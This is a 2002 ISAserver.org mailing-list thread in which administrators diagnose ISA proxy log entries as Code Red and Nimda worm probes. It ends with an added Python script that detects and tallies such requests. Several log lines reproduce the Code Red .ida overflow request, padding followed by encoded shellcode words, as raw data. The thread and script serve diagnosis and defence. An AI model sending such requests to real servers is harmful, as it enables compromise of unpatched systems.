Tough crowd. I was under the assumption that most users subscribed here have been well aware of the Code Red exploit. My apologies. My intentions were to point you in the right direction. Below is a link that goes over the exploit, and will give you some additional information.

http://www.cert.org/advisories/CA-2001-19.html

Dave

-----Original Message-----
From: Joseph [mailto:cismic@xxxxxxx]
Sent: Tuesday, April 09, 2002 2:39 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: Log

http://www.ISAserver.org

What you need to look at are the IIS logs next to determine if the vCache 304 record allowed it access to your IIS machine. If your IIS machine has the latest service packs then no, you should not be affected.

Joseph

-----Original Message-----
From: Craig A. Hansen [mailto:CHansen@xxxxxxxxxxxxx]
Sent: Tuesday, April 09, 2002 11:38 AM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: Log

Is a server of mine infected or is getting blocked?

Craig Hansen

-----Original Message-----
From: Ewing, David F. [mailto:dewing@xxxxxxxxxxxxxxxxxxx]
Sent: Tuesday, April 09, 2002 1:35 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: Log

Nimda.

-----Original Message-----
From: Craig A. Hansen [mailto:CHansen@xxxxxxxxxxxxx]
Sent: Tuesday, April 09, 2002 2:30 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] Log

Does anyone know exactly what is happening here?
Thanks,

#Fields: c-ip cs-username c-agent date time s-computername cs-referred r-host r-ip r-port time-taken cs-bytes sc-bytes cs-protocol s-operation cs-uri s-object-source sc-status

216.93.16.114 anonymous - 4/7/2002 10:55:17 PROXY - <file://www.worm.com> www.worm.com - - 19078 4039 - -
GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a VCache 304

208.246.141.116 anonymous - 4/7/2002 15:25:22 PROXY - <file://www.worm.com> www.worm.com - - 18578 4039 - -
GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a VCache 304

200.178.163.35 anonymous - 4/7/2002 15:29:52 PROXY - <file://www.worm.com> www.worm.com - - 18328 4039 - -
GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a VCache 304

61.242.154.155 anonymous - 4/7/2002 18:39:33 PROXY - <file://www.worm.com> www.worm.com - - 18672 4039 - -
GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a Inet 200

200.68.3.26 anonymous - 4/7/2002 20:21:00 PROXY - <file://www.worm.com> www.worm.com - - 18844 4039 - -
GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a VCache 304

200.67.7.199 anonymous - 4/7/2002 23:00:29 PROXY - <file://www.worm.com> www.worm.com - - 18406 4039 - -
GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a VCache 304

61.157.84.32 anonymous - 4/7/2002 23:28:03 PROXY - <file://www.worm.com> www.worm.com - - 18937 4039 - -
GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a VCache 304

202.105.86.209 anonymous - 4/7/2002 23:46:54 PROXY - <file://www.worm.com> www.worm.com - - 18375 4039 - -
GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a VCache 304

Craig Hansen

------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as: dewing@xxxxxxxxxxxxxxxxxxx
To unsubscribe send a blank email to $subst('Email.Unsub')
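
Added example, not part of the original thread: one way to pull entries of this shape out of an ISA proxy log and tally them by s-object-source and sc-status, the two fields Joseph's reply turns on. It assumes each entry sits on one unwrapped line in the #Fields order posted above; the sample lines, addresses, host name and query string are constructed.

```python
import re
from collections import Counter

# Field order copied from the #Fields header in the posted log.
FIELDS = ("c-ip cs-username c-agent date time s-computername cs-referred "
          "r-host r-ip r-port time-taken cs-bytes sc-bytes cs-protocol "
          "s-operation cs-uri s-object-source sc-status").split()

# Request shape seen in the thread: an .ida query padded with a long run of one
# repeated character, followed by several %uXXXX-encoded words.
IDA_PROBE = re.compile(r"\.ida\?(.)\1{99,}(?:%u[0-9a-f]{4}){4,}", re.I)

def parse_line(line):
    """Return a dict keyed by FIELDS, or None for comments and malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    # Drop <scheme://host> tokens a mail client inserts next to hostnames,
    # like the <file://...> token in the posted entries.
    parts = [p for p in line.split() if not (p[0] == "<" and p[-1] == ">")]
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def find_ida_probes(lines):
    """Records whose cs-uri matches the padded .ida request shape."""
    records = (parse_line(l) for l in lines)
    return [r for r in records if r and IDA_PROBE.search(r["cs-uri"])]

def summarize(hits):
    """Count hits per (s-object-source, sc-status) so cache-sourced and
    Internet-sourced entries can be compared side by side."""
    return Counter((h["s-object-source"], h["sc-status"]) for h in hits)

# Constructed sample: documentation addresses, a made-up host, and a harmless
# stand-in for the query string (same shape, not the payload from the log).
PAD = "N" * 224 + "%u4141" * 6 + "=a"
HOST = "www.example.test"
SAMPLE = [
    "#Fields: " + " ".join(FIELDS),
    f"192.0.2.10 anonymous - 4/7/2002 10:55:17 PROXY - <file://{HOST}> {HOST} "
    f"- - 19078 4039 - - GET http://{HOST}/default.ida?{PAD} VCache 304",
    f"192.0.2.11 anonymous - 4/7/2002 18:39:33 PROXY - {HOST} "
    f"- - 18672 4039 - - GET http://{HOST}/default.ida?{PAD} Inet 200",
    f"192.0.2.12 anonymous - 4/7/2002 19:00:00 PROXY - {HOST} "
    f"- - 120 300 512 - GET http://{HOST}/index.html Inet 200",
]

if __name__ == "__main__":
    for key, count in summarize(find_ida_probes(SAMPLE)).items():
        print(key, count)
```

The source addresses of the matching records are the ones to look for in the IIS logs of any web server published behind the proxy.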